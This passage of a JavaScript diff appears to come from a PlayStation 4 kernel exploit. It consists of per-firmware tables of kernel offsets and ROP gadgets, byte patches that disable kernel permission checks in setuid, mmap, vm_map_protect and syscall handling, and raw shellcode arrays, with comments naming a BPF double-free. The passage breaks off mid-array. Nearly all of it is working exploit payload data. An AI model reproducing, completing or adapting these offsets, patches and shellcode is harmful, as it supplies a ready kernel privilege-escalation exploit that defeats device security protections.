3.50 + 'sys_setuid_patch_offset': 0x001A44A0, // 3.50 + 'sys_mmap_patch_offset': 0x00349667, // 3.50 + 'vm_map_protect_patch_offset': 0x00341383, // 3.50 + 'amd64_syscall_patch1_offset': 0x0, /* CHECKTHIS */ + 'amd64_syscall_patch2_offset': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch1_offset': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch2_offset': 0x0, /* CHECKTHIS */ + 'syscall_11_patch1_offset': 0x00EEDA90, // 3.50-3.55 + 'syscall_11_patch2_offset': 0x00EEDA98, // 3.50-3.55 + 'syscall_11_patch3_offset': 0x00EEDAB8, // 3.50-3.55 + }; +} else if (fwFromUA === 3.55) { + kernel_offsets = { + '_vn_lock_break_slide': 0x00242CE6, // 3.55 + '__stack_chk_guard': 0x0242AD10, // 3.50-3.55 + 'kqueue_close_slide': 0x0017BC22, // 3.55 + 'bpf_slide': 0x0024BDA3, // 3.55 + 'jmp [rsi]': 0x001EF468, // 3.55 + 'cpu_setregs': 0x003A6E80, // 3.55 + 'mov cr0, rax': 0x003A6E89, // 3.55 + 'sys_setuid_patch_offset': 0x001A45C0, // 3.55 + 'sys_mmap_patch_offset': 0x00349A97, // 3.55 + 'vm_map_protect_patch_offset': 0x003417B3, // 3.55 + 'amd64_syscall_patch1_offset': 0x0, /* CHECKTHIS */ + 'amd64_syscall_patch2_offset': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch1_offset': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch2_offset': 0x0, /* CHECKTHIS */ + 'syscall_11_patch1_offset': 0x00EEDA90, // 3.50-3.55 + 'syscall_11_patch2_offset': 0x00EEDA98, // 3.50-3.55 + 'syscall_11_patch3_offset': 0x00EEDAB8, // 3.50-3.55 + }; +} else if (fwFromUA === 3.70) { + kernel_offsets = { + '_vn_lock_break_slide': 0x00242DB6, // 3.70 + '__stack_chk_guard': 0x0243AD10, // 3.70 + 'kqueue_close_slide': 0x0017BCF2, // 3.70 + 'bpf_slide': 0x0024BE73, // 3.70 + 'jmp [rsi]': 0x001CAD28, // 3.70 + 'cpu_setregs': 0x003A6F70, // 3.70 + 'mov cr0, rax': 0x003A6F79, // 3.70 + 'sys_setuid_patch_offset': 0x001A4690, // 3.70 + 'sys_mmap_patch_offset': 0x00349B67, // 3.70 + 'vm_map_protect_patch_offset': 0x00341883, // 3.70 + 'amd64_syscall_patch1_offset': 0x0, /* CHECKTHIS */ + 'amd64_syscall_patch2_offset': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch1_offset': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch2_offset': 0x0, /* CHECKTHIS */ + 'syscall_11_patch1_offset': 0x00EF6FA0, // 3.70 + 'syscall_11_patch2_offset': 0x00EEDFA8, // 3.70 + 'syscall_11_patch3_offset': 0x00EEDFC8, // 3.70 + }; +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.01) { + kernel_offsets = { + '_vn_lock_break_slide': 0x00109D66, // 4.00-4.01 + '__stack_chk_guard': 0x024600D0, // 4.00-4.06 + 'kqueue_close_slide': 0x00233930, // 4.00-4.01 + 'bpf_slide': 0x003176D9, // 4.00-4.01 + 'jmp [rsi]': 0x00016B71, // 4.00-4.01 + 'cpu_setregs': 0x00389200, // 4.00-4.01 + 'mov cr0, rax': 0x00389209, // 4.00-4.01 + 'sys_setuid_patch_offset': 0x00085BB0, // 4.00-4.07 + 'sys_mmap_patch_offset': 0x0031CEAC, // 4.00-4.01 + 'vm_map_protect_patch_offset': 0x004422B7, // 4.00-4.01 + 'amd64_syscall_patch1_offset': 0x000ECFB6, // 4.00-4.01 + 'amd64_syscall_patch2_offset': 0x000ECFDB, // 4.00-4.01 + 'sys_dynlib_dlsym_patch1_offset': 0x0014A9AD, // 4.00-4.01 + 'sys_dynlib_dlsym_patch2_offset': 0x000E2CC0, // 4.00-4.01 + 'syscall_11_patch1_offset': 0x00F179A0, // 4.00-4.06 + 'syscall_11_patch2_offset': 0x00F179A8, // 4.00-4.06 + 'syscall_11_patch3_offset': 0x00F179C8, // 4.00-4.06 + }; +} else if (fwFromUA === 4.05) { + kernel_offsets = { + '_vn_lock_break_slide': 0x00109E96, // 4.05-4.07 + '__stack_chk_guard': 0x024600D0, // 4.00-4.06 + 'kqueue_close_slide': 0x00233A60, // 4.05-4.07 + 'bpf_slide': 0x00317809, // 4.05 + 'jmp [rsi]': 0x00065750, // 4.05-4.07 + 'cpu_setregs': 0x00389330, // 4.05 + 'mov cr0, rax': 0x00389339, // 4.05 + 'sys_setuid_patch_offset': 0x00085BB0, // 4.00-4.07 + 'sys_mmap_patch_offset': 0x0031CFDC, // 4.05 + 'vm_map_protect_patch_offset': 0x004423E7, // 4.05 + 'amd64_syscall_patch1_offset': 0x000ED096, // 4.05-4.07 + 'amd64_syscall_patch2_offset': 0x000ED0BB, // 4.05-4.07 + 'sys_dynlib_dlsym_patch1_offset': 0x0014AADD, // 4.05-4.07 + 'sys_dynlib_dlsym_patch2_offset': 0x000E2DA0, // 4.05-4.07 + 'syscall_11_patch1_offset': 0x00F179A0, // 4.00-4.06 + 'syscall_11_patch2_offset': 0x00F179A8, // 4.00-4.06 + 'syscall_11_patch3_offset': 0x00F179C8, // 4.00-4.06 + }; +} else if (fwFromUA === 4.06) { + kernel_offsets = { + '_vn_lock_break_slide': 0x00109E96, // 4.05-4.07 + '__stack_chk_guard': 0x024600D0, // 4.00-4.06 + 'kqueue_close_slide': 0x00233A60, // 4.05-4.07 + 'bpf_slide': 0x00317819, // 4.06-4.07 + 'jmp [rsi]': 0x00065750, // 4.05-4.07 + 'cpu_setregs': 0x00389340, // 4.06-4.07 + 'mov cr0, rax': 0x00389349, // 4.06-4.07 + 'sys_setuid_patch_offset': 0x00085BB0, // 4.00-4.07 + 'sys_mmap_patch_offset': 0x0031CFEC, // 4.06-4.07 + 'vm_map_protect_patch_offset': 0x00442427, // 4.06-4.07 + 'amd64_syscall_patch1_offset': 0x000ED096, // 4.05-4.07 + 'amd64_syscall_patch2_offset': 0x000ED0BB, // 4.05-4.07 + 'sys_dynlib_dlsym_patch1_offset': 0x0014AADD, // 4.05-4.07 + 'sys_dynlib_dlsym_patch2_offset': 0x000E2DA0, // 4.05-4.07 + 'syscall_11_patch1_offset': 0x00F179A0, // 4.00-4.06 + 'syscall_11_patch2_offset': 0x00F179A8, // 4.00-4.06 + 'syscall_11_patch3_offset': 0x00F179C8, // 4.00-4.06 + }; +} else if (fwFromUA === 4.07) { + kernel_offsets = { + '_vn_lock_break_slide': 0x00109E96, // 4.05-4.07 + '__stack_chk_guard': 0x024640D0, // 4.07 + 'kqueue_close_slide': 0x00233A60, // 4.05-4.07 + 'bpf_slide': 0x00317819, // 4.06-4.07 + 'jmp [rsi]': 0x00065750, // 4.05-4.07 + 'cpu_setregs': 0x00389340, // 4.06-4.07 + 'mov cr0, rax': 0x00389349, // 4.06-4.07 + 'sys_setuid_patch_offset': 0x00085BB0, // 4.00-4.07 + 'sys_mmap_patch_offset': 0x0031CFEC, // 4.06-4.07 + 'vm_map_protect_patch_offset': 0x00442427, // 4.06-4.07 + 'amd64_syscall_patch1_offset': 0x000ED096, // 4.05-4.07 + 'amd64_syscall_patch2_offset': 0x000ED0BB, // 4.05-4.07 + 'sys_dynlib_dlsym_patch1_offset': 0x0014AADD, // 4.05-4.07 + 'sys_dynlib_dlsym_patch2_offset': 0x000E2DA0, // 4.05-4.07 + 'syscall_11_patch1_offset': 0x00F1B9A0, // 4.07 + 'syscall_11_patch2_offset': 0x00F1B9A8, // 4.07 + 'syscall_11_patch3_offset': 0x00F1B9C8, // 4.07 + }; +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.55) { + kernel_offsets = { + '__stack_chk_guard': 0x02610AD0, // 4.50-4.55 + 'jmp [rsi]': 0x0013A39F, // 4.50-4.55 + 'kqueue_close_slide': 0x001E2640, // 4.50-4.55 + 'cpu_setregs': 0x00280F70, // 4.50-4.55 + 'mov cr0, rax': 0x00280F79, // 4.50-4.55 + 'sys_setuid_patch_offset': 0x001144E3, // 4.50-4.55 + 'sys_mmap_patch_offset': 0x00141D14, // 4.50-4.55 + 'vm_map_protect_patch_offset': 0x00396A56, // 4.50-4.55 + 'amd64_syscall_patch1_offset': 0x003DC603, // 4.50-4.55 + 'amd64_syscall_patch2_offset': 0x003DC621, // 4.50-4.55 + 'sys_dynlib_dlsym_patch1_offset': 0x003CF6FE, // 4.50-4.55 + 'sys_dynlib_dlsym_patch2_offset': 0x000690C0, // 4.50-4.55 + 'syscall_11_patch1_offset': 0x0102B8A0, // 4.50-4.55 + 'syscall_11_patch2_offset': 0x0102B8A8, // 4.50-4.55 + 'syscall_11_patch3_offset': 0x0102B8C8, // 4.50-4.55 + }; +} else if (fwFromUA === 4.70) { + kernel_offsets = { + 'jmp [rsi]': 0x00139A2F, // 4.70-4.74 + 'kqueue_close_slide': 0x001E48A0, // 4.70-4.74 + 'cpu_setregs': 0x00283190, // 4.70 + 'mov cr0, rax': 0x00283199, // 4.70 + 'sys_setuid_patch_offset': 0x00113B73, // 4.70-4.74 + 'sys_mmap_patch_offset': 0x001413A4, // 4.70-4.74 + 'vm_map_protect_patch_offset': 0x003978E6, // 4.70 + 'amd64_syscall_patch1_offset': 0x003DD523, // 4.70 + 'amd64_syscall_patch2_offset': 0x003DD541, // 4.70 + 'sys_dynlib_dlsym_patch1_offset': 0x003D061E, // 4.70 + 'sys_dynlib_dlsym_patch2_offset': 0x000686A0, // 4.70-4.74 + 'syscall_11_patch1_offset': 0x010349A0, // 4.70-4.74 + 'syscall_11_patch2_offset': 0x010349A8, // 4.70-4.74 + 'syscall_11_patch3_offset': 0x010349C8, // 4.70-4.74 + }; +} else if (fwFromUA >= 4.71 && fwFromUA <= 4.74) { + kernel_offsets = { + 'jmp [rsi]': 0x00139A2F, // 4.70-4.74 + 'kqueue_close_slide': 0x001E48A0, // 4.70-4.74 + 'cpu_setregs': 0x00283120, // 4.71-4.74 + 'mov cr0, rax': 0x00283129, // 4.71-4.74 + 'sys_setuid_patch_offset': 0x00113B73, // 4.70-4.74 + 'sys_mmap_patch_offset': 0x001413A4, // 4.70-4.74 + 'vm_map_protect_patch_offset': 0x00397876, // 4.71-4.74 + 'amd64_syscall_patch1_offset': 0x003DD4B3, // 4.71-4.74 + 'amd64_syscall_patch2_offset': 0x003DD4D1, // 4.71-4.74 + 'sys_dynlib_dlsym_patch1_offset': 0x003D05AE, // 4.71-4.74 + 'sys_dynlib_dlsym_patch2_offset': 0x000686A0, // 4.70-4.74 + 'syscall_11_patch1_offset': 0x010349A0, // 4.70-4.74 + 'syscall_11_patch2_offset': 0x010349A8, // 4.70-4.74 + 'syscall_11_patch3_offset': 0x010349C8, // 4.70-4.74 + }; +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.01) { + kernel_offsets = { + 'jmp [rsi]': 0x00013460, // 5.00-5.07 + 'kqueue_close_slide': 0x0016D762, // 5.00-5.01 + 'cpu_setregs': 0x00232F10, // 5.00-5.01 + 'mov cr0, rax': 0x00232F19, // 5.00-5.01 + 'sys_setuid_patch_offset': 0x00054A72, // 5.00-5.07 + 'sys_mmap_patch_offset': 0x0013D510, // 5.00-5.01 + 'vm_map_protect_patch_offset': 0x001A3AF6, // 5.00-5.01 + 'amd64_syscall_patch1_offset': 0x00000493, // 5.00-5.01 + 'amd64_syscall_patch2_offset': 0x000004B1, // 5.00-5.01 + 'sys_dynlib_dlsym_patch1_offset': 0x00237E2A, // 5.00-5.01 + 'sys_dynlib_dlsym_patch2_offset': 0x002B2350, // 5.00-5.01 + 'syscall_11_patch1_offset': 0x0107C820, // 5.00-5.07 + 'syscall_11_patch2_offset': 0x0107C828, // 5.00-5.07 + 'syscall_11_patch3_offset': 0x0107C848, // 5.00-5.07 + }; +} else if (fwFromUA >= 5.03 && fwFromUA <= 5.07) { + kernel_offsets = { + 'jmp [rsi]': 0x00013460, // 5.00-5.07 + 'kqueue_close_slide': 0x0016D872, // 5.03-5.07 + 'cpu_setregs': 0x00233020, // 5.03-5.07 + 'mov cr0, rax': 0x00233029, // 5.03-5.07 + 'sys_setuid_patch_offset': 0x00054A72, // 5.00-5.07 + 'sys_mmap_patch_offset': 0x0013D620, // 5.03-5.07 + 'vm_map_protect_patch_offset': 0x001A3C06, // 5.03-5.07 + 'amd64_syscall_patch1_offset': 0x00000493, // 5.03-5.07 + 'amd64_syscall_patch2_offset': 0x000004B1, // 5.03-5.07 + 'sys_dynlib_dlsym_patch1_offset': 0x00237F3A, // 5.03-5.07 + 'sys_dynlib_dlsym_patch2_offset': 0x002B2620, // 5.03-5.07 + 'syscall_11_patch1_offset': 0x0107C820, // 5.00-5.07 + 'syscall_11_patch2_offset': 0x0107C828, // 5.00-5.07 + 'syscall_11_patch3_offset': 0x0107C848, // 5.00-5.07 + }; +} else if (fwFromUA === 6.50) { + kernel_offsets = { + 'jmp [rsi]': 0x00050F2D, // 6.50 + 'kqueue_close_slide': 0x00185F92, // 6.50 + 'cpu_setregs': 0x000A1B70, // 6.50 /* CHECKTHIS */ + 'mov cr0, rax': 0x000A1B79, // 6.50 /* CHECKTHIS */ + 'sys_setuid_patch_offset': 0x0010BB20, // 6.50 + 'sys_mmap_patch_offset': 0x000AB57A, // 6.50 + 'vm_map_protect_patch_offset': 0x00451A06, // 6.50 + 'amd64_syscall_patch1_offset': 0x00000490, // 6.50-7.00 + 'amd64_syscall_patch2_offset': 0x000004B3, // 6.50-7.00 + 'sys_dynlib_dlsym_patch1_offset': 0x001D85AA, // 6.50 + 'sys_dynlib_dlsym_patch2_offset': 0x00419F20, // 6.50 + 'syscall_11_patch1_offset': 0x0111D210, // 6.50 + 'syscall_11_patch2_offset': 0x0111D218, // 6.50 + 'syscall_11_patch3_offset': 0x0111D238, // 6.50 + }; +} else if (fwFromUA === 7.00) { + kernel_offsets = { + 'jmp [rsi]': 0x0006B192, // 7.00 + 'kqueue_close_slide': 0x00079F02, // 7.00 + 'cpu_setregs': 0x004923E0, // 7.00 /* CHECKTHIS */ + 'mov cr0, rax': 0x004923ED, // 7.00 /* CHECKTHIS */ + 'sys_setuid_patch_offset': 0x00087B70, // 7.00 + 'sys_mmap_patch_offset': 0x001D2336, // 7.00 + 'vm_map_protect_patch_offset': 0x00264C06, // 7.00 + 'amd64_syscall_patch1_offset': 0x00000490, // 7.00 + 'amd64_syscall_patch2_offset': 0x000004B3, // 7.00 + 'sys_dynlib_dlsym_patch1_offset': 0x0009547B, // 7.00 + 'sys_dynlib_dlsym_patch2_offset': 0x002F2C20, // 7.00 + 'syscall_11_patch1_offset': 0x0, // 7.00 /* CHECKTHIS */ + 'syscall_11_patch2_offset': 0x0, // 7.00 /* CHECKTHIS */ + 'syscall_11_patch3_offset': 0x0, // 7.00 /* CHECKTHIS */ + }; +} + +// Missing: <=3.70 and all devkits +// These are from the decrypted/dumped kernel +var kernel_patches = {}; +if (fwFromUA >= 3.50 && fwFromUA <= 3.70) { + kernel_patches = { + 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00 + 'sys_setuid_patch_2': 0x85C38900, // 3.50-4.07 + 'sys_mmap_patch_1': 0x37B54137, // 3.50-3.70 + 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00 + 'vm_map_protect_patch_1': 0x9090CA39, // 3.50-3.70 + 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00 + 'amd64_syscall_patch1_1': 0x0, /* CHECKTHIS */ + 'amd64_syscall_patch1_2': 0x0, /* CHECKTHIS */ + 'amd64_syscall_patch2_1': 0x0, /* CHECKTHIS */ + 'amd64_syscall_patch2_2': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch1_1': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch1_2': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch2_1': 0x0, /* CHECKTHIS */ + 'sys_dynlib_dlsym_patch2_2': 0x0, /* CHECKTHIS */ + }; +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.07) { + kernel_patches = { + 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00 + 'sys_setuid_patch_2': 0x85C38900, // 3.50-4.07 + 'sys_mmap_patch_1': 0x37B74137, // 4.05-4.07 + 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00 + 'vm_map_protect_patch_1': 0x9090C239, // 4.00-4.07 + 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00 + 'amd64_syscall_patch1_1': 0x00000000, // 3.55-5.07 + 'amd64_syscall_patch1_2': 0xF8858B48, // 4.00-4.07 + 'amd64_syscall_patch2_1': 0x00007DE9, // 4.00-4.07 + 'amd64_syscall_patch2_2': 0x72909000, // 4.00-4.07 + 'sys_dynlib_dlsym_patch1_1': 0x0002A9E9, // 4.00-4.07 + 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00 + }; +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.74) { + kernel_patches = { + 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00 + 'sys_setuid_patch_2': 0xC6894100, // 4.50-4.74 + 'sys_mmap_patch_1': 0x37B64137, // 4.50-4.74 + 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00 + 'vm_map_protect_patch_1': 0x9090EA38, // 4.50-4.74 & 6.50 + 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00 + 'amd64_syscall_patch1_1': 0x00000000, // 3.55-5.07 + 'amd64_syscall_patch1_2': 0x40878B49, // 4.50-5.07 + 'amd64_syscall_patch2_1': 0x909079EB, // 4.50-4.74 + 'amd64_syscall_patch2_2': 0x72909090, // 4.50-5.07 + 'sys_dynlib_dlsym_patch1_1': 0x000352E9, // 4.05-4.74 + 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00 + }; +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.07) { + kernel_patches = { + 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00 + 'sys_setuid_patch_2': 0xC4894100, // 5.00-5.07 + 'sys_mmap_patch_1': 0x37B64037, // 5.00-7.00 + 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00 + 'vm_map_protect_patch_1': 0x9090FA38, // 5.00-5.07 + 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00 + 'amd64_syscall_patch1_1': 0x00000000, // 3.55-7.00 + 'amd64_syscall_patch1_2': 0x40878B49, // 4.50-7.00 + 'amd64_syscall_patch2_1': 0x90907DEB, // 5.00-5.07 + 'amd64_syscall_patch2_2': 0x72909090, // 4.50-5.07 + 'sys_dynlib_dlsym_patch1_1': 0x0001C1E9, // 5.00-5.07 + 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00 + }; +} else if (fwFromUA === 6.50) { + kernel_patches = { + 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00 + 'sys_setuid_patch_2': 0x74C08500, // 6.50-7.00 + 'sys_mmap_patch_1': 0x37B64037, // 5.00-7.00 + 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00 + 'vm_map_protect_patch_1': 0x9090EA38, // 4.50-4.74 & 6.50 + 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00 + 'amd64_syscall_patch1_1': 0x00000000, // 3.55-7.00 + 'amd64_syscall_patch1_2': 0x40878B49, // 4.50-7.00 + 'amd64_syscall_patch2_1': 0x00019DE9, // 6.50-7.00 + 'amd64_syscall_patch2_2': 0x72909000, // 6.50-7.00 + 'sys_dynlib_dlsym_patch1_1': 0x0001C7E9, // 6.50 + 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00 + }; +} else if (fwFromUA === 7.00) { + kernel_patches = { + 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00 + 'sys_setuid_patch_2': 0x74C08500, // 6.50-7.00 + 'sys_mmap_patch_1': 0x37B64037, // 5.00-7.00 + 'sys_mmap_patch_2': 0x3145C031, // 3.55-7.00 + 'vm_map_protect_patch_1': 0x9090F238, // 7.00 + 'vm_map_protect_patch_2': 0x90909090, // 3.55-7.00 + 'amd64_syscall_patch1_1': 0x00000000, // 3.50-7.00 + 'amd64_syscall_patch1_2': 0x40878B49, // 4.50-7.00 + 'amd64_syscall_patch2_1': 0x00019DE9, // 6.50-7.00 + 'amd64_syscall_patch2_2': 0x72909000, // 6.50-7.00 + 'sys_dynlib_dlsym_patch1_1': 0x0001BDE9, // 7.00 + 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00 + 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00 + }; +} + +// Missing: <=3.70, and all devkits +// Generate this vs making each one? +// These are from the decrypted/dumped kernel +// This is Xfast_syscall and then the objects location in relation to Xfast_syscall +// Fixes are needed for BPF Double Free and namedobj +// Xfast_syscall: +// 4.00-4.01: 0x0030EA00, 4.05: 0x0030EB30, 4.06-4.07: 0x0030EB40, 4.50-4.55: 0x003095D0, 4.70: 0x0030B840, 4.71-4.74: 0x0030B7D0, 5.00-7.00: 0x000001C0 +// malloc +// 4.00-4.05: 0x0013D430, 4.06-4.07: 0x0013D440, 4.50-4.55: 0x000EE180, 4.70-4.74: 0x000ECDF0, 5.00-5.01: 0x0010DF80, 5.03-5.07: 0x0010E090 +// printf +// 4.00-4.07: 0x00038A50, 4.50-4.55: 0x002F16A0‬, 4.70: 0x002F3910‬, 4.71-4.74: 0x002F38A0, 5.00-5.01: 0x00435AB0, 5.03: 0x00435E40, 5.05-5.07: 0x00435E80 +// M_KQUEUE +// 4.00-4.01: 0x0104A8C0‬, 4.05: 0x0104E790, 4.06: 0x0104A780, 4.07: 0x0104E780, 4.50-4.55: 0x0165A680, 4.70: 0x1660500, 4.71-4.74: 0x01660570, 5.00-5.07: 0x014B7160 + +var cleanup_shcode = []; +if (fwFromUA === 3.50) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = []; /* TODO */ + } +} else if (fwFromUA === 3.55) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x14D02494, 0x8D4DFFCF, 0x2BD024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04A790C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.01) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x16002494, 0x8D4DFFCF, 0x2BD024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04A8C0C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 4.05) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x14D02494, 0x8D4DFFCF, 0x2BD024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04A790C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 4.06) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x14C02494, 0x8D4DFFCF, 0x2BC024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04A780C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 4.07) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x14C02494, 0x8D4DFFCF, 0x2BC024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04E780C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.55) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x6A302494, 0x8D4DFFCF, 0xE18024B4, 0x8D4D000E, 0xE96024AC, 0x8149FFD0, 0x65A680C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 